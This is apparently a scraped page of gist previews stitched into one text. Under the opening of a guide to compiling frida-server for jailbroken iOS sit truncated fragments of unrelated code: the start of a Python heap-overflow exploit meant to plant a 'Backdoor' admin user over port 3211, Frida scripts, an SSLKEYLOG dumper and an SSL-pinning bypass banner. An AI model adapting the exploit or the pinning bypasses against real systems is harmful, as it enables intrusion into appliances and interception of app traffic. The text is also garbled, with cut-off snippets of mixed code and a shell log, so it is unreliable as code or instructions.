Here, I'll show you how to compile frida-server
(≥ 16.2.2) for rootful, rootless and RootHide jailbreaks.
If you want to compile an old version of Frida (< 16.2.2) you can use my old guide.
import socket, struct, sys | |
def p32(x):
    """Pack *x* as a 4-byte big-endian unsigned integer (struct ``">I"``)."""
    return struct.pack(">I", x)


def p16(x):
    """Pack *x* as a 2-byte big-endian signed integer (struct ``">h"``)."""
    return struct.pack(">h", x)


def p8(x):
    """Pack *x* as a 1-byte signed integer (struct ``">b"``)."""
    return struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user | |
def exploit(hostname, username="Backdoor", password="Backdoor"): | |
global socks # python closes out of scope sockets | |
port = 3211 # port is hardcoded in the binary | |
usernm = username.encode() |
jevin@wombat [22:32:18] [~/code/mac/widget/xnu_unsuspend] [main *] | |
-> % sudo taskinfo 'Deliveries Widget' | |
process: "Deliveries Widget" [30145] [unique ID: 1220404] | |
architecture: arm64 | |
coalition (type 0) ID: 105936 | |
coalition (type 1) ID: 591 | |
suspend count: 1 | |
virtual bytes: 389.40 GB; phys_footprint bytes: 8.92 MB; phys_footprint lifetime maximum bytes: 8.92 MB | |
run time: 42 s | |
user/system time (current threads): 0.046565 s / 0.036279 s |
// dump classes and selectors forbidden in NSPredicates | |
// `cc -framework Foundation -o restricted restricted.m` | |
#import <Foundation/Foundation.h> | |
#import <dlfcn.h> | |
int main() { | |
void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0); | |
NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses"); | |
NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors"); | |
NSLog(@"Restricted Selectors: %@", RestrictedSelectors()); |
#!/usr/bin/env python3 | |
import json | |
import frida | |
from frida.core import Device, Session, Script, ScriptExportsSync | |
def _on_diagnostics(diag) -> None:
    """Echo each compiler diagnostic to stdout as it is emitted."""
    print(f"on_diagnostics: {diag}")


# Build the TypeScript agent into a single bundle, minified with terser.
compiler: frida.Compiler = frida.Compiler()
compiler.on("diagnostics", _on_diagnostics)
bundle: str = compiler.build('permissions.ts', compression='terser')
import threading | |
from frida_tools.application import Reactor | |
import frida | |
class Application: | |
def __init__(self): | |
self._stop_requested = threading.Event() |
Based on this article https://dev.to/halimsamy/wsl-for-developers-installing-the-android-sdk-53n9
sudo apt-get update
/** | |
* Android, iOS (12.0-15.7.3), Linux universal SSLKEYLOG dumper. | |
* | |
* Usage: | |
* | |
* # For iOS and mac: | |
* rvictl -s [UDID] | |
* # Then open Wireshark and select rvi0 | |
* | |
* # For iOS and not mac: |
const typeMap = { | |
"c": "char", | |
"i": "int", | |
"s": "short", | |
"l": "long", | |
"q": "long long", | |
"C": "unsigned char", | |
"I": "unsigned int", | |
"S": "unsigned short", |
// Startup banner: script name plus the Frida version and script runtime it is running under.
const bannerLines = [
    "[*] SSL Pinning Bypasses",
    `[*] Your frida version: ${Frida.version}`,
    `[*] Your script runtime: ${Script.runtime}`,
];
bannerLines.forEach((line) => console.log(line));
/** | |
* by incogbyte | |
* Common functions | |
* thx apkunpacker, NVISOsecurity, TheDauntless | |
 * Remember that SSL pinning can be custom-implemented; sometimes you need to reverse it with Ghidra, IDA or a similar tool. | |
* !!! THIS SCRIPT IS NOT A SILVER BULLET !! |